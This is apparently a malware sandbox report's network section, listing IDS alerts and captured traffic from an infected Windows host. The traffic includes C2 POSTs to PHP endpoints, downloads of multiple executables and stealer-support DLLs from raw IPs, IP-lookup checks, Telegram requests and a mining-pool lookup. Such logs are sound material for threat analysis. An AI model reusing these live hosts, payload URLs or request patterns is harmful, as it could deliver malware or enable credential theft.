Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDGCGDBGCAAEBFIECGHHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 33 63 64 61 30 65 62 66 37 36 37 33 31 31 61 66 30 34 62 33 39 37 65 65 61 31 33 62 33 64 31 30 61 36 32 35 65 38 36 38 65 39 66 32 66 64 38 65 35 34 37 36 61 66 37 66 37 31 64 32 38 31 62 63 34 62 66 37 65 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 47 43 47 44 42 47 43 41 41 45 42 46 49 45 43 47 48 2d 2d 0d 0a Data Ascii: ------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="token"73cda0ebf767311af04b397eea13b3d10a625e868e9f2fd8e5476af7f71d281bc4bf7eb5------HJDGCGDBGCAAEBFIECGHContent-Disposition: form-data; name="message"fplugins------HJDGCGDBGCAAEBFIECGH--
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKEBFCFIJJKKECAKJEHDHost: 185.215.113.100Content-Length: 7271Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGCAKFHCFHJKECFIIDHost: 147.45.126.10Content-Length: 7069Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
May check the online IP address of the machine
Source: unknown DNS query: name: api64.ipify.org
Source: unknown DNS query: name: ipinfo.io
Source: unknown DNS query: name: iplogger.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49735 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49734 -> 176.113.115.33:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49733 -> 147.45.44.104:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49739 -> 31.41.244.9:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49742 -> 176.111.174.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49753 -> 46.8.231.109:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49775 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49781 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:64650 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49786 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49787 -> 185.215.113.100:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49789 -> 46.29.235.52:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49744 -> 76.76.21.142:443
Source: Network traffic Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49785 -> 95.179.241.203:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stamppreewntnq.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=JucIrCz8M4V0Z1zjTRa.FFlYqlA1e5ENGA_.qLcWJ.Y-1725603466-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=UUOFWhuuwYuY.kabjHj7o96D61lAGsStIibOP.iArD8-1725603468-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=U4NEU7shPFIMhhw4GXtqwXZamOhdW4NoBG..0Z6q_yc-1725603480-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=PH3t8AxI4YISlQ0ButgKSks67MRVVjpRqnzxmV0xuDQ-1725603511-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: condedqpwqm.shop
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.143.223.148
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 185.143.223.148
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 133Host: 185.143.223.148
Source: global traffic HTTP traffic detected: HEAD /ssl/install.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /vjgg.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /sgnr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d897ad1752a_File.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vjgg.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sgnr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ssl/install.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
Source: global traffic HTTP traffic detected: HEAD /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d897ad1752a_File.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /api/twofish.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Content-Length: 561Host: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 185.143.223.148
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 176.113.115.33
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 31.41.244.9
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 176.111.174.109
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 147.45.44.104
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: unknown TCP traffic detected without corresponding DNS query: 46.29.235.52
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_0050B480 InternetOpenUrlA,InternetReadFile,InternetCloseHandle, 2_2_0050B480
Source: global traffic HTTP traffic detected: GET /?format=json HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: api64.ipify.org
Source: global traffic HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: file-link-iota.vercel.appCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /handler/download?action=download&download_id=uuVCUDm6&private_id=cb726802f5fcca567315ff7c87e27582&url=https%253A%252F%252Fyoutransfer.net%252FuuVCUDm6%252Fcb726802f5fcca567315ff7c87e27582 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Cache-Control: no-cacheHost: youtransfer.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /1nhuM4.js HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: iplogger.org
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1.exe HTTP/1.1Host: smkn2sumbawabesar.sch.idConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET /fneogr HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=f3c4d6f56f5d888bd9_3268186582621973209
Source: global traffic HTTP traffic detected: GET /api/crazyfish.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.143.223.148
Source: global traffic HTTP traffic detected: GET /vjgg.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sgnr.exe#space HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nokia/lamp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 31.41.244.9Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /bobr HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.111.174.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /ssl/install.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 176.113.115.33Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66c6fcb30b9dd_123p.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d897ad1752a_File.exe#xin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d59ef9d4404_premium.exe#upus HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /malesa/66d1b7f7f3765_Front.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /yuop/66d9de22f231f_crypted.exe#1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /revada/66d98aa7bea3e_newPrime.exe#real HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /prog/66d70e8640404_trics.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36Host: 147.45.44.104Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vjgg.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /lnef.exe HTTP/1.1Host: 46.29.235.52Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sql.dll HTTP/1.1Host: 147.45.126.10Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: api64.ipify.org
